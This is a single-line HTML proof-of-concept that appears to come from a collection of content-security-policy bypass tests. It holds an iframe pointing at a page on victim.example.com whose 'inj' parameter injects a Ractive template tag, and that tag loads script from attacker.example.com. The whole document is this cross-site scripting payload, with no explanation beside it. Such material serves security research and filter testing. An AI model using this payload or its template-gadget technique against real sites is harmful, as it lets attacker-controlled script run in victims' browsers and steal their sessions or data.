<iframe src="http://victim.example.com/repo/csp/sd/ractive.php?xssfilter=1&inj=<script id='template' type='text/ractive'><!--%20--><script src='http://attacker.example.com/shout/' /></script>"></iframe>
